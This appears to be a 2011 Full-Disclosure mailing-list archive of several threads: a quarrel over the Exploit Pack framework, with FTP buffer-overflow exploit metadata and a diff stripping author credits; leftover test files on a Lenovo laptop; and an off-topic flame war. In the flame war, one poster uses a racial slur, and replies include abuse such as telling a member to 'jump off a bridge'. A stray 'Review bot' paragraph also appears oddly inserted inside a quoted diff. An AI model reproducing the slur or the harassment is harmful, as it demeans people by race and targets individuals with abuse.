>> to give credit, so people who are using the pack, could atleastfeel sure
>> with some coders,that the code will be very nice, and not painful to read or
>> , modify even to make it nicer.. that is why i like to always makesure
>> authors get some credit, however it may be, it only needbe a nick/name, but
>> you are using theyre things, but on your people who your paying, i guess you
>> should maybe put in place then rules that, all exploits paid for, would not
>> recieve credits, other than, part of devteam or part of exploit-pack
>> codepack.
>> It aint hard to keep people happy. Whilst still producing quality, or, non
>> quality.
>> i will run your pack, using ONE well know exploit, and if that fails, i
>> will have results here, compared to backbox scan or, another vuln scan,
>> then, i will comment further. How does that sound?
>> Ok. I will do my research, but, i aint angry at you, nor the product,
>> altho i dislike Insect, this one, seems to have some good features. So yea,
>> ill take an open look, i only think, if code is NOT paid for, then you
>> should put authors name or handle in there somwhere, maybe even something
>> for paid exploits... people do appreciate a 'thanks to' sometimes...
>> especially you it seems.
>> xd
>>
>>
>> On 6 October 2011 10:47, Juan Sacco  wrote:
>>
>>> Hey,
>>> Its really a shame that you didn't even take like 2 minutes to watch the
>>> source code of Exploit Pack before create an opinion.
>>> This can't be a copy of CANVAS. Canvas is made on Python. Exploit Pack
>>> JAVA. See the diference? Also, please take a look at the interface design,
>>> both are really different. Show me where Exploit Pack is similar to Canvas!
>>> I think you spent too much time looking for Waldo :-D
>>>
>>> We respect the exploit author and that is why I add them at the first
>>> line of the XML file
>>> You should run the program before creating this crappy post with your
>>> nonsense opinions ( Harassing the free work of others, you wrote lke 5 - 6
>>> insulting posts in like.. 2 minutes?.. Dude go find a girl, come on )
>>>
>>> Take a look if you want:
>>>
>>> 
>>> 
>>>
>>> >> Platform="windows" Service="ftp" Type="remote" RemotePort="21" LocalPort="" 
>>> ShellcodeAvailable="R" ShellPort="" SpecialArgs="">
>>> 
>>>
>>> 
>>> Free Float FTP Server USER Command Remote Buffer Overflow Exploit
>>> when parsing the command 'USR', which leads to a stack based overflow. Also 
>>> Free Float FTP Server allow remote anonymous login by default
>>> exploiting these issues could allow an attacker to compr

Re: [Full-disclosure] Strange Lenovo x121e

2011-10-05 Thread xD 0x41
hrm...
I have known of this structure applied, usually when a user is a 'newbie'
and, it is usually still done by shops or, workers at them... and, i was
originally thinking, maybe since i have also got blade IBM, but, I bought it
FROM MS directly and, nothing on it but emptiness, and this is 2 machines we
bought at once...
IBM x342 PIII 1.4ghz 3U Rack Server - IBM 86695RX
-3U rack, small but as the MS employee told me, it MUST be completely
shredded, and sits on now just cmd prompt, and there is absolutely no files,
even for scsi, which was first my thoughts.
I am really wondering what it was used as, like possible ex test/demo
but, I know 2 pl other than me who can attest to this, and they have not
seen these files before, not in their blades from IBM.
I have not used Lenovo x series, although, i only can think of those things
added, if they think you're a noob, in which case it would have been specified
that it came with 'system utils to make it save itself.." or some such other
infos.. but, i assume that's not the case at all.
Anyhow, i think this box was preused, but, i think if it was, to a minor
degree..altho, my blade, has NOT a scratch on it, and was pre used too..
hehe..so i really wonder, what does it take to even scratch a x1 :s
They're thick...and, a scratch could be nothing but, attests to wear n
tear... so i would be questioning my seller, for sure, and getting some kind
of discount, i'd also show them these files, and, even quotes from the FD
list, and i bet you they will say some kinda excuse, and refund you a bit ;)
this should be wiped, on any sales, it should never be more than a cmd
prompt, and then, you would fdisk it and format it to use it perfect, you
should never have 13gig on windows os, considering those are also used for
windows ofc, but, still the seller should say that, "15gig taken up for the
system checking/saving/admin files...", but clearly they have tried to
cover something up.
I would expose this one hd. 100%.
You can..
regards,
xd


On 6 October 2011 12:05, halfdog  wrote:

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> xD 0x41 wrote:
> > Hrm this one is tricky, but smells so bad of preuse, specially when
> > you said this;
> >
> > * Inside seal on plastic bag also intact, but glue is suboptimal,
> > I opened the bag without damaging the seal
> >
> > Thats a clear sign of tamperage...thats when they tell you "do not
> > buy" ... so i wonder :s
>
> Yeah, but I've also got trained fingers. And applying stickers on
> completely fresh plastic surfaces can be tricky, especially when
> plastic foil was surface-treated, so that it does not stick to itself
> before being manufactured to plastic bags.
>
> > I know it could . Is it perhaps something being leftover, from
> > some badly warezd ISO Windows install...wich can lay dormant, even
> > after a format but, not after fdisk usually... strange, i cannot
> > figure this one. It smells of pre-use, or ex-demo, but, i have got,
> > 3 ibm netvista 2cpu boxes,1 3.3gig awesome IBM thinkcentre,fastest
> > box i have as in loading/swap access,and IBM Blade,IBM laptop, and
> > not one has those files...i even paid for ex-demo on the laptop,
> > and it was installed...
>
> I think, I have a good explanation: I looked through the files and
> found quite a mess, even for MS-system. Even c:\ is loaded with
> various nonstandard files. Many of these files are around testing
> (testplan xy, fantest, modemtest, mark3d, ..) and test orchestration
> scripts, one of them setting the clock back to 2010-01-01, so file mod
> dates should be meaningless.
>
> It seems, that the machine contains at least 13G of windows-OS and
> testing software. I found some test reports (dated 2010-01-01), that
> contain the hardware tag of the machine. The BIOS seems to be
> 2011-06-21, that is also proof for clock manipulation during testing.
>
> What could be interesting: Although I found some tools via google,
> e.g. rw-everything, a "hardware configuration reader/dumper", there
> are also some tools I do not know, that might deal about branding or
> special hardware initialization, e.g.
>
> ./WWAN/Leadcore/BAK/IMEI.TXT
> ./WWAN/Leadcore/IMEI.TXT
>
> with different IMEI in it. Perhaps the disk contains some new tools
> that allow to reset broken hardware/firmware internals to any state
> you like, e.g. perhaps the imei of your modem.
>
>
> > i can only see *no* good reason for .exe to be on the drive, after
> > a sale. It should have always been wiped/fdisk/shredded, as I know
> > i have had done withthe ex demos i have here, and, they are part
> > lenovo and part IBM and still, not one of those files exits on any
> > box, and the laptop wich, i thought would forsure have

Re: [Full-disclosure] Full-Disclosure - sick of your nonsense

2011-10-05 Thread xD 0x41
Eh for someone who claims they don't like nonsense, then why make a thread, i
will not be a part of this thread btw, my problem with n3td3v, was NOT
instigated by me either... and btw when u pick on my grammar, take a look @
your own ones..

Luckily, there are mail filters, so i your me

So, luckily, my time won't be wasted, coz i won't be replying to you, nor this
thread, you have created to make your own noise, kid.
ciao.
xd


On 6 October 2011 14:14, mitchell  wrote:

> Personally, if I dislike a product i do not use it. However, I
> understand that there are people that need to share their likes and
> dislikes with as many people as possible. The usefulness of this is
> arguable at best.
>
> Luckily, there are mail filters, so i your messages take more CPU
> seconds than real seconds of my time.
>
> Take care.
>
> #/mitchell
>
> On 10/06/2011 02:48 AM, xD 0x41 wrote:
> > Starting fights... because i dislike one product, and question ITsec...
> > is hardly what your trying to make me out to be.
> > Think, and do as you like.
> > cheers.
> > xd
> >
> >
> > On 6 October 2011 10:31, Sam Goody <trashm...@hush.com> wrote:
> >
> > Dude, I think many people including myself are sick of your
> > nonsense on top of trying to provoke fights on full-disc.
> >
> > This list is not for chatting and 90% of what you've written is
> > subpar.
> >
> > Please keep the nonsense to yourself. You will now be added to the
> > n3td3v e-mail black list.
> >
> > Cheers!
> >
> >
> >
> >

Re: [Full-disclosure] New open source Security Framework

2011-10-05 Thread xD 0x41
I would say, this code would require better, like Creative Commons, perhaps
licensing on 3rd party code, then it can be named exactly what is and isn't
added in as a 'paper' to the commons, it is better for his project, i
think... GPLv3 , i have not studied but, i am considering the use of 3rd
party modules which have NO licensing whatsoever.
I will try to help him but, he has to understand, there are simple rules
about these things... I think he does though understand, so i will offer my
help in this anyhow.. I guess you also have helped, by pointing the
licensing out for him too.. But i'd debate on which license to use... i'd take
CCommons..
cheers,
xd


On 6 October 2011 14:34, root  wrote:

> Juan,
>
> You don't have the faintest idea of how licencing works. You cannot slap
> a GPL v3 license to any software you see, much less erase the author's
> names. If you find a code in the internet without any license, you
> pretty much can't touch it, and must re-implement it completely.
>
> Software business steal code all the time, but they don't release the
> software for everybody to see!
>
> Next time instead of a few laughs at a list, you may get sued and lose
> real money, you fool.
>
> Please learn how licensing works and just then republish all your code.
>
>
> On 10/05/2011 06:25 PM, Juan Sacco wrote:
> > If you want the right to demand certain things from the program, then go BUY
> > a program and do not harass people who are writing software for free, or go
> > and help the developers by writing the functionality yourself.
> >
> > Juan Sacco
> >
> > On Wed, Oct 5, 2011 at 6:32 AM, root  wrote:
> >
> >> - * @author Stefan Zeiger (szei...@novocode.com)
> >> - print "   Written by Blake  "
> >> - 
> >>
> >> +#Exploit Pack - Security Framework for Exploit Developers
> >> +#Copyright 2011 Juan Sacco http://exploitpack.com
> >> +#
> >> +#This program is free software: you can redistribute it and/or modify
> >> it under the terms of the
> >> +#GNU General Public License as published by the Free Software
> >> Foundation, either version 3
> >> +#or any later version.
> >> +#
> >> +#This program is distributed in the hope that it will be useful, but
> >> WITHOUT ANY WARRANTY;
> >> +#without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
> >> PARTICULAR
> >> +#PURPOSE. See the GNU General Public License for more details.
> >> +#
> >> +#You should have received a copy of the GNU General Public License
> >> along with this program.
> >> +#If not, see http://www.gnu.org/licenses/
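Review bot: the `-` lines drop the existing attribution (`@author Stefan Zeiger`, `Written by Blake`) while the `+` lines put a `Copyright 2011 Juan Sacco` GPLv3 header in their place, so the files no longer show who wrote the third-party code. Keep the original author lines, add the project notice alongside them rather than instead of them, and only apply the GPLv3 grant to a file whose own license allows it; a file with no license stated should be marked as such and left out of the grant.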
> >>
> >>
> >>
> >> Ys why not?
> >>
> >
>

Re: [Full-disclosure] Strange Lenovo x121e

2011-10-05 Thread xD 0x41
> Perhaps the disk contains some new tools
> that allow to reset broken hardware/firmware internals to any state
> you like, e.g. perhaps the imei of your modem

I have (repeating) seen this, (ONLY on a laptop...), but it is very
possible... but 13gig of it :S
that's a bit much...


On 6 October 2011 12:45, coderman  wrote:

> On Wed, Oct 5, 2011 at 6:05 PM, halfdog  wrote:
> >...
> > It seems, that the machine contains at least 13G of windows-OS and
> > testing software
> > What could be interesting: Although I found some tools via google,
> > e.g. rw-everything, a "hardware configuration reader/dumper", there
> > are also some tools I do not know, that might deal about branding or
> > special hardware initialization, e.g.
> >
> > ./WWAN/Leadcore/BAK/IMEI.TXT
> > ./WWAN/Leadcore/IMEI.TXT
> >
> > with different IMEI in it. Perhaps the disk contains some new tools
> > that allow to reset broken hardware/firmware internals to any state
> > you like, e.g. perhaps the imei of your modem.
>
>
> these kinds of tools do exist, and are exceptionally useful.
>
> often highly proprietary (containing magic signing keys or firmwares
> for testing).
>
> what about a full file dump? were you able to reconstruct anything useful?
>  i can has? :P
>

Re: [Full-disclosure] New open source Security Framework

2011-10-06 Thread xD 0x41
1337 and then 31337 for exec cmd..yea.. but have not seen more paid...


On 6 October 2011 19:01, Dan Dart  wrote:

> tl;dr past popcorn, but when I saw $2, I lol'd. Weren't Google giving $1337
> at some point? And didn't it go up to like $50,000 for a terrible remote
> root exploit?
>
> Regards
>

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-06 Thread xD 0x41
Just some updates... seems there is a fire blazing maybe soon..

VPN Providers Mull "Fraudster" Database In Wake of Lulzec Fiasco
http://feed.torrentfreak.com/~r/Torrentfreak/~3/4MWSrug7DKA/

nasty..


On 5 October 2011 22:17,  wrote:

> On Wed, 05 Oct 2011 17:25:20 +0900, Robert Kim App and Facebook Marketing
> said:
> > Guys... i can't stand sites like Attrition
> > it's all based on total hearsay and feed off mob stupidity. AND it ruins
> > perfectly good reputations.
>
> OK, I'll bite.  What percent of Attrition listings are of sites that didn't
> actually get hacked? (Serious question there - I've never actually done a
> check of their accuracy.  Anybody got numbers to back up Robert's claim?)
>
> And I'm not sure that an Attrition listing is sufficient to ruin a good
> reputation. Heck, Sony won a Pwnie Award and it didn't do squat to their
> stock price.
>

Re: [Full-disclosure] [OT] the nigger said: "American people understand that not everybody's been following the rules"

2011-10-06 Thread xD 0x41
eek..

risking n3td3v fate, sorry for offtopic.

I think you came close buddy, but no way do you come close to that n3td3v
dood... Although, you are usually one of the people i look to on this list
for some guidance, ie, you, thor, halfdog, madirish, and many other
older/better trained to this, and that one did let me down, but no way would
i scrap you for a n3td3v :)
cheers.. just gotta b careful nowadays, specially if you're in .au where, there
is basically no racism... not to the extent of gangs etc setup who are
attacking other people for race...color,etc.. well, not yet.
stay cool buddy
xd



On 7 October 2011 04:21, Georgi Guninski  wrote:

> risking n3td3v fate, sorry for offtopic.
>
> the nigger said [1] (no offense intended to black people):
>
> "American people understand that not everybody's been following the rules,"
> he said. "These days, a lot of folks doing the right thing are not rewarded.
> A lot of folks who are not doing the right thing are rewarded."
>
> [1] http://www.cbsnews.com/8301-503544_162-20116707-503544.html
>
> --
> joro
>

Re: [Full-disclosure] 0day Full disclosure: American Express

2011-10-06 Thread xD 0x41
Hello,
I have had almost exactly the same thing here, with anz.com , and this
is now ended but almost as bad as that!
They were being scammed, and spam mails were actually making it to the inbox
and were half decent, so i tried, multiple times to put in a 'contact form'
which kept resetting when i'd submit, and make some error page... Then same
bank but a different branch, i was able to ring, and explain, then they
offered to ring another bank, total different one but also being targeted
for scam and , as always the famous CCard.
It was frustrating as hell.. and so far, did not get any thanks, yet have
noticed the crap drop off completely now.
i guess is sad and, a huge reason about why i love this topic... it is very
frustrating.
You were vigilant, I applaud this, because that's the only way with some
places, and you would expect these places, ie, anz, to have some abuse-only
mails, well at that time, they didn't, and i have not seen it with a quick
browse... but i imagine they changed nothing, I hope they fixed the form it
was only browser based bug, but still, it took me a cpl days, but yes they did
get scammed, and many many numbers were then released onto even irc nets... i
saw this and was a bit saddened, sometimes security can be a harsh place to
work or, try to help even.
cheers,
xd

R.I.P Steve Jobs
Innovative/Ingenious mind,
Thank you for the old Apple Box,
that's how i became addicted to tech, will be sadly missed.



On 6 October 2011 17:55, John Doe  wrote:

> http://qnrq.se/full-disclosure-american-express/
>

Re: [Full-disclosure] OT Nigger - georgi+guninski+nigger+full-disclosure

2011-10-06 Thread xD 0x41
eh... lol, i am living in australia, and know exactly how things work.
I think you are maybe sending the email without reading the poster's email...
I have not said anything about USA, only au.
for someone who is meant to be mature, you don't seem to act it,... but, you're
throwing abuse at the wrong guy.
And yes, i know exactly how gangs work,. and, have actually spent 4yrs
behind bars :) thx k.
bye
xd





On 7 October 2011 06:09, Sam Goody  wrote:

> You should really jump off a bridge. You always talk out of your
> ass including this one.
>
> How do you know there isn't racism in AU?
>
> How you ever been there? Do you know any history about the racism
> that the native Indians have experienced? Do you know about all
> other cultures that have had to endure racist laws in the AU?
>
> You have got no clue you piece of shit.
>
> Why don't you fucking get your head out of your ass. And what do
> you know about gangs? Are you now a gang expert? So gangs now
> inspire racism?
>
> Do you even know what racism means?
>
> You're a fucking failure you American piece of Shit.
>
>

Re: [Full-disclosure] OT Nigger - georgi+guninski+nigger+full-disclosure

2011-10-06 Thread xD 0x41
> Do you know any history about the racism
> that the native Indians have experienced?

haha yes yes they would be named Aboriginals, in USA , the Indians were
somewhat persecuted :)

get YOUR head out of YOUR arse idiot.
xd



On 7 October 2011 06:09, Sam Goody  wrote:

> You should really jump off a bridge. You always talk out of your
> ass including this one.
>
> How do you know there isn't racism in AU?
>
> How you ever been there? Do you know any history about the racism
> that the native Indians have experienced? Do you know about all
> other cultures that have had to endure racist laws in the AU?
>
> You have got no clue you piece of shit.
>
> Why don't you fucking get your head out of your ass. And what do
> you know about gangs? Are you now a gang expert? So gangs now
> inspire racism?
>
> Do you even know what racism means?
>
> You're a fucking failure you American piece of Shit.
>
>

Re: [Full-disclosure] OT Nigger - georgi+guninski+nigger+full-disclosure

2011-10-06 Thread xD 0x41
> “, the Indians were somewhat persecuted :)  “
>
> By that I take it you mean, systematic genocide? Where I grew up the school
> mascot (high school) was Benjamin Logan, an in(?)-famous Indian killer who
> not only murdered Indians, he wiped out entire villages massacring men,
> women and children in most of the villages in the area to eliminate the
> “native threat” for the white settlers.

hehe i really don't know, and really, don't care... it is always some new and
different views, so i just know from my school classes, indians were indeed
hunted, and they also, fought back.. a bit like aboriginals here.. but, this
guy i think was high on ice or sumthin before he even spoke to me, he
assumes i am now a racist :s
I was saying, this country here in .au , is prolly the least one i could
think of, as we have maybe 5 races alone in my street, maybe more, how could
you fight your neighbor... a bit like some countries ;) (iran/iraq ,
serbia/bosnia)...just got up one day because told to, and took up arms,
literally, against their neighbors... That's happening now, and it is still
called genocide..
That is 'life'... I ain't young enough to join the army and make any
difference.
anyhow, i ain't really into this race talk, and, don't want nothin to do with
it, am no racist, simply not brought up to think badly of other people...
this could happen, anywhere..
cheers
xd



On 7 October 2011 06:19, Csirt, Star  wrote:

> “, the Indians were somewhat persecuted :)  “
>
> By that I take it you mean, systematic genocide? Where I grew up the school
> mascot (high school) was Benjamin Logan, an in(?)-famous Indian killer who
> not only murdered Indians, he wiped out entire villages massacring men,
> women and children in most of the villages in the area to eliminate the
> “native threat” for the white settlers.
>
> *From:* full-disclosure-boun...@lists.grok.org.uk [mailto:
> full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *xD 0x41
> *Sent:* Thursday, October 06, 2011 3:14 PM
> *To:* Sam Goody
> *Cc:* **full-disclosure@lists.grok.org.uk**
> *Subject:* Re: [Full-disclosure] OT Nigger -
> georgi+guninski+nigger+full-disclosure
>
> Do you know any history about the racism
> that the native Indians have experienced?
>
> haha yes yes they would be named Aboriginals, in USA , the
> Indians were somewhat persecuted :)
>
> get YOUR head out of YOUR arse idiot.
> xd
>
>
> 
>
> On 7 October 2011 06:09, Sam Goody  wrote:
>
> You should really jump off a bridge. You always talk out of your
> ass including this one.
>
> How do you know there isn't racism in AU?
>
> How you ever been there? Do you know any history about the racism
> that the native Indians have experienced? Do you know about all
> other cultures that have had to endure racist laws in the AU?
>
> You have got no clue you piece of shit.
>
> Why don't you fucking get your head out of your ass. And what do
> you know about gangs? Are you now a gang expert? So gangs now
> inspire racism?
>
> Do you even know what racism means?
>
> You're a fucking failure you American piece of Shit.
>

Re: [Full-disclosure] New open source Security Framework

2011-10-06 Thread xD 0x41
Hi Valdis,
it is more complex than i thought...
I do support open src, and am going to try and help the exploit pack, so, i
hope that the maker is reading all of this and making some adjustments
perhaps... a lot of them actually.
I did not think it was as complex as it has shown to be, but it indeed is.
I am still a bit worried though, of the actual NON free product, and then,
what if you add to that, and he adds it to his paid-for app, or worse,
doesn't even put it into the exploit-pack but, rather puts it into ONLY the
paid product.
Being .py script based code, it really has potential but the author has to
get the GPL/licensing in order and, make Insect pro and this product cleared
up, as in to where your exploit code goes, will it stay there, or will it be
added to his paid app... he could even be doing this, to get cheap exploits,
to indeed put into the paid app... it is another possibility, but, i do see
he is putting in the hours, as in trying to make some changes to this app so
it does work... so, for now, it is in public.
cheers.
xd



On 7 October 2011 01:09,  wrote:

> On Wed, 05 Oct 2011 19:04:24 -0300, Juan Sacco said:
>
> > Exploit Pack is licensed GPL let me copy & paste the 4 freedoms. I hope to
> > do it well this time.
>
> Please note that one of the biggest complaints about the GPL is that it is
> pretty much impossible to legally combine GPL code with code that has a
> non-GPL-compatible license (which includes most proprietary code).  So you
> need to be careful about the origins and licensing on each and every line of
> code that you include from other sources.
>
>

Re: [Full-disclosure] [OT] the nigger said: "American people understand that not everybody's been following the rules"

2011-10-06 Thread xD 0x41
i guess some, but we don't see ourselves as different to them.
They were simply here first.
That's how they like to be seen, nowadays..
I am not going to even go into racism in usa, but Indians, blacks and all
people would take exception to what YOU said, about 'niggers'.
So stop shifting the blame,... i was tryin to b nice to you, re something
VERY stupid and racist, which YOU said, so don't pull me into it buds, you
said the word, not me.
We dont even use 'niggers' here so, your in a way different country,
to do with racism, we don't like it, nor allow it, want an example?
AFL league here, our code of football (rather rough but still..football) and
highly paid people... if one of them is caught on or off mic, saying the
'abo' word, in a nasty way to another player, that could mean end of their
season, and at the VERY least, a HUGE amount of fine, and at least 6 weeks out
of game.. which is the norm.
It is not out of control here, and, i think aboriginals would agree.
I know many, and they like to be seen as white, or, just aussies.
Nothing more.
You should NEVER pick on someone's color George, and this is what YOU did,
not me.
xd



On 7 October 2011 06:56,  wrote:

> On Fri, 07 Oct 2011 05:53:05 +1100, xD 0x41 said:
>
> > cheers.. just gotta b careful nowdays, specially if your in .au where, there
> > is basically no racism...
>
> I suspect some of the aboriginals would take exception to that statement.
>

Re: [Full-disclosure] New open source Security Framework

2011-10-06 Thread xD 0x41
Well, I guess then people nowadays should be keeping more watch on ANYTHING
they release into public... It is just going to get more complex i assume,
with adding more licenses, as creative commons has kindly done.. however i
do like their license, as it actually covers a .txt file, or even a .c
file... which is mainly why i have used it once in past for some code, so I
could then keep an eye on it, but never have looked at all, at GPL.
Anyhow, thx Valdi for shedding more light on things.


On 7 October 2011 07:03,  wrote:

> On Fri, 07 Oct 2011 06:36:51 +1100, xD 0x41 said:
>
> > I am still a bit worried though, of the actual NON free product, and then,
> > what if you add to that, and he adds it to his paid-for app, or worse,
> > doesn't even put it into the exploit-pack but, rather puts it into ONLY the
> > paid product.
>
> One of the good things about the GPL (as opposed to the BSD license), is that
> you *can't* take GPL code private - if he's adding it to the proprietary app
> and shipping the result under a non-GPL license, he's in violation of the GPL
> and could end up in court.  A lot of embedded hardware people have gotten
> into trouble that way.  The *vast* majority have cleaned up their act and
> complied with the GPL requirements by either removing the GPL code or
> releasing source as required by the GPL.  A few have been silly enough to let
> it get to court, and have universally been handed their butts by the judge.
>
> http://www.gpl-violations.org/
>
>
>

Re: [Full-disclosure] OT Nigger - georgi+guninski+nigger+full-disclosure

2011-10-06 Thread xD 0x41
hehe, and, what's that to do with racist, do you even realise many of those
things, are actually asked for by leaders of communities, I am assuming you're
pointing at one of .australian notes, you should really be ashamed..really,
take a look at who you are if you're american, and you can truly say, you're not
racists, you always seem to have a view on it, and always a comment on it,
that's probably why so many world-leaders have called usa a big-mouth and
bully so much... sorry but, racism, usa takes the lead there... i mean, half
of your country still has archaic laws, in mississippi even, gawd.. i won't go
into it, you should be ashamed, at least some countries are trying to make
inroads to their past failures, not, keep it alive.. fire burning bright.
I used to loveee usa, and still kinda do, but, i really dislike the way it
has handled many diplomatic things, and, this is not a place to be
discussing it, maybe, amuse me on irc otherwise please, don't include me on
USA politics and racism...
It is by far the worst topic usa could be involved in.
You are comparing a tiny country, to a country of multiple millions...and
some, and you still haven't clearly, learnt from persecutions against the
many , for example, atm right now, Afghanistan...wasting peoples time/money
and other countries, for something which is a fail and, you know it.
Don't involve me in your pathetic race riots and online crp, i don't want
anything to do with it.
have a nice day.
xd



On 7 October 2011 07:04, Jeffrey Walton  wrote:

> On Thu, Oct 6, 2011 at 3:19 PM, Csirt, Star  wrote:
> > “, the Indians were somewhat persecuted :)  “
> >
> > By that I take it you mean, systematic genocide? Where I grew up the school
> > mascot (high school) was Benjamin Logan, an in(?)-famous Indian killer who
> > not only murdered Indians, he wiped out entire villages massacring men,
> > women and children in most of the villages in the area to eliminate the
> > “native threat” for the white settlers.
> At least the US did not put his picture on paper money (like another
> who attempted genocide).
>
> Jeff
>

Re: [Full-disclosure] OT Nigger - georgi+guninski+nigger+full-disclosure

2011-10-06 Thread xD 0x41
umm.. i did not start this thread, nor many of the ones you're actually
replying to... have you even noticed this.
fool.


On 7 October 2011 07:04, Antony widmal  wrote:

> Thing is, you bring shit, stupidity, troll on this mailing list. Most
> people here would agree.
> How about you start another shit/off-topic thread about Israel vs
> Palestinian this time ?
> Could be a fucking great topic on a IT sec mailing list.
>
>
> On Thu, Oct 6, 2011 at 3:53 PM, xD 0x41  wrote:
>
>> Oh, the brilliant one with nothing to offer... again.
>> This list is getting worse, with or w/out me.. it only needs u and n3td3v
>> and is perfect. yung.
>> I make, i think, abit more than the avg McDonalds manager... so , you can
>> dreamup your sick fantasies but, unfortunately the truth is truth.
>> ciao bella.
>> xd
>>
>>
>>
>> On 7 October 2011 06:44, Antony widmal  wrote:
>>
>>> Didn't know you could flip burgers and use your smartphone while working
>>> at Mc-Donald.
>>>
>>>
>>> On Thu, Oct 6, 2011 at 3:24 PM, xD 0x41  wrote:
>>>
>>>> “, the Indians were somewhat persecuted :)  “
>>>>
>>>>
>>>> By that I take it you mean, systematic genocide? Where I grew up the
>>>> school mascot (high school) was Benjamin Logan, an in(?)-famous Indian
>>>> killer who not only murdered Indians, he wiped out entire villages
>>>> massacring men, women and children in most of the villages in the area to
>>>> eliminate the “native threat” for the white settlers.
>>>>
>>>> hehe i really dont know, and really, dont care... it is always some new
>>>> and different views, so i just know from my school classes, indians were
>>>> indeed hunted, and they also, fought back.. abit like aboriginals here..
>>>> but, this guy i think was high on ice or sumthin before he even spoke to 
>>>> me,
>>>> he assumes i am now a racist :s
>>>> I was saying, this country here in .au , is prolly the least one i could
>>>> think of, as we have maybe 5 races alone in my street, maybe more, how 
>>>> could
>>>> you fight your neighbor... abit like some countries ;) (iran/iraq ,
>>>> serbia/bosnia)...just gotup one day because told to, and took up arms,
>>>> literally, against theyre neighbors... Thats happening now, and it is still
>>>> called genocide..
>>>> That is "life'... I aint young enough to join the army and make any
>>>> difference.
>>>> anyhow, i aint really into this race talk, and, dont want nothin todo
>>>> with it, am no racist, simply not brought up to think badly of other
>>>> people... this could happen, anywhere..
>>>> cheers
>>>> xd
>>>>
>>>>
>>>>
>>>> On 7 October 2011 06:19, Csirt, Star  wrote:
>>>>
>>>>> “, the Indians were somewhat persecuted :)  “
>>>>>
>>>>> By that I take it you mean, systematic genocide? Where I grew up the
>>>>> school mascot (high school) was Benjamin Logan, an in(?)-famous Indian
>>>>> killer who not only murdered Indians, he wiped out entire villages
>>>>> massacring men, women and children in most of the villages in the area to
>>>>> eliminate the “native threat” for the white settlers.
>>>>>
>>>>> *From:* full-disclosure-boun...@lists.grok.org.uk [mailto:
>>>>> full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *xD 0x41
>>>>> *Sent:* Thursday, October 06, 2011 3:14 PM
>>>>> *To:* Sam Goody
>>>>> *Cc:* full-disclosure@lists.grok.org.uk
>>>>> *Subject:* Re: [Full-disclosure] OT Nigger -
>>>>> georgi+guninski+nigger+full-disclosure
>>>>>
>>>>> Do you know any history about the racism
>>>>> that the native Indians have experienced?
>>>>>
>>>>> haha yes yes they would be named Aboriginals, in USA , the
>>>>> Indians were somewhat persecuted :)
>>>>>
>>>>> get YOUR head out of YOUR arse idiot.
>>>>> xd
>>>>>

Re: [Full-disclosure] [OT] the nigger said: "American people understand that not everybody's been following the rules"

2011-10-06 Thread xD 0x41
Yes of course, we have gangs here roaming wild, attacking each other because
of color... yep!
you sure know your stuff!


On 7 October 2011 07:07, Benjamin Krueger  wrote:

> Racism in Australia is so notable, it has its own Wikipedia article.
> Unfortunately the article does not touch on recent Australian racism,
> particularly amongst government officials, against African refugees and
> immigrants.
>
> http://en.wikipedia.org/wiki/Racism_in_Australia
>
> On Oct 6, 2011, at 12:56 PM, valdis.kletni...@vt.edu wrote:
>
> On Fri, 07 Oct 2011 05:53:05 +1100, xD 0x41 said:
>
> cheers.. just gotta b careful nowdays, specially if your in .au where,
> there
>
> is basically no racism...
>
>
> I suspect some of the aboriginals would take exception to that statement.

Re: [Full-disclosure] [OT] the nigger said: "American people understand that not everybody's been following the rules"

2011-10-06 Thread xD 0x41
And as for wikipedia, i don't think you would FIT all of USA's racism crap
into it, so it is separated, i think i would find at least 100 wiki: on
Usa*racism, try it, then show the REAL stats.
Anyhow, this is not my shit, so, stop looking to me, i did not start this
thread, nor give a crap about it, and, you clearly do not understand
australian laws, nor, have lived here, or you would know that, we are far
from racists, and, our past mistakes, have at least been 'apologised' for,
diplomatically, which is mainly, what the natives here wanted, the
aboriginals.
Have a nice day to you also.
xd



On 7 October 2011 07:07, Benjamin Krueger  wrote:

> Racism in Australia is so notable, it has its own Wikipedia article.
> Unfortunately the article does not touch on recent Australian racism,
> particularly amongst government officials, against African refugees and
> immigrants.
>
> http://en.wikipedia.org/wiki/Racism_in_Australia
>
> On Oct 6, 2011, at 12:56 PM, valdis.kletni...@vt.edu wrote:
>
> On Fri, 07 Oct 2011 05:53:05 +1100, xD 0x41 said:
>
> cheers.. just gotta b careful nowdays, specially if your in .au where,
> there
>
> is basically no racism...
>
>
> I suspect some of the aboriginals would take exception to that statement.

Re: [Full-disclosure] [OT] the nigger said: "American people understand that not everybody's been following the rules"

2011-10-06 Thread xD 0x41
who's trolling who?
screw you, and this stupid thread.




On 7 October 2011 07:48, Benjamin Krueger  wrote:

> http://en.wikipedia.org/wiki/Straw_man
>
> On Oct 6, 2011, at 1:46 PM, xD 0x41 wrote:
>
> Yes ofcourse, we have gangs here roaming wild, attacking eachother because
> of color... yep!
> you sure know your stuff!
>
>
> On 7 October 2011 07:07, Benjamin Krueger wrote:
>
>> Racism in Australia is so notable, it has its own Wikipedia article.
>> Unfortunately the article does not touch on recent Australian racism,
>> particularly amongst government officials, against African refugees and
>> immigrants.
>>
>> http://en.wikipedia.org/wiki/Racism_in_Australia
>>
>> On Oct 6, 2011, at 12:56 PM, valdis.kletni...@vt.edu wrote:
>>
>> On Fri, 07 Oct 2011 05:53:05 +1100, xD 0x41 said:
>>
>> cheers.. just gotta b careful nowdays, specially if your in .au where,
>> there
>>
>> is basically no racism...
>>
>>
>> I suspect some of the aboriginals would take exception to that statement.

Re: [Full-disclosure] [OT] the nigger said: "American people understand that not everybody's been following the rules"

2011-10-06 Thread xD 0x41
*yawns*
is 7am here dude quit with it, racism is just bad for anyone.
so stop it, please, this is my final post to this thread, it is useless,
a bit like you.
whether george, or anyone made any errors, that is still not FD!
Show me some exploit, and i will respect.
For showing me nonsense trolling, you get nothing benj.
later.


On 7 October 2011 07:55, Benjamin Krueger  wrote:

> http://www.nizkor.org/features/fallacies/red-herring.html
>
> On Oct 6, 2011, at 1:48 PM, xD 0x41 wrote:
>
> And as for wikipedia, i dont think you would FIT all of USA's racism crap
> into it, so it is seperated, i think i would find atleast 100 wiki: on
> Usa*racism, try it, then show the REAL stats.
> Anyhow, this is not my shit, so, stop looking to me, i did not start this
> thread, nor give a crap about it, and, you clearly do not understand
> australian laws, nor, have lived here, or you would know that, we are far
